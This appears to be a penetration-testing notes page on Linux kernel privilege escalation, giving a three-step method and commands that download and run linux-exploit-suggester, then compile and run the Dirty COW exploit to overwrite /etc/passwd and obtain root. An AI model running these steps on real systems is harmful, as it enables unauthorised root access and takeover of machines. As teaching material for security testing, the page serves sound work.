Linux Kernel Exploit

Kernel Exploits on Linux target vulnerabilities in the Linux Kernel to execute arbitrary code, allowing an attacker to run privileged system commands or gain a system shell. The process varies depending on the kernel version, distribution, and the specific exploit used.

Privilege Escalation Process on Linux

Identify Kernel Vulnerabilities – Check the target system’s kernel version and look for known vulnerabilities.
Download & Compile Exploits – Obtain the appropriate exploit code, compile it, and prepare it for execution.
Transfer & Execute the Exploit – Move the compiled exploit to the target system and run it to gain elevated privileges.

Linux Exploit Suggester

This tool helps identify security weaknesses in a Linux kernel or Linux-based machine. It uses heuristic methods to analyze the system and determine its exposure to publicly known Linux Kernel exploits.

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing toolGitHub

# have access to the target system

/bin/bash -i
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

upload les.sh
chmod +x les.sh
ls -alps
./les.sh

# download Drity Cow exploit from exploit db
# Compile the dirty.c exploit using gcc
# -pthread  -> Enable POSIX threads (multithreading support)
# dirty.c   -> Source code file to compile
# -o dirty  -> Output filename will be "dirty"
# -lcrypt   -> Link the crypt library (used for password-related functions)
gcc -pthread dirty.c -o dirty -lcrypt

chmod +x dirty
./dirty [NEW PASS]

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)Exploit Database

PreviousLinux PrivEsc NextMisconfigured Cron Jobs

Last updated 10 months ago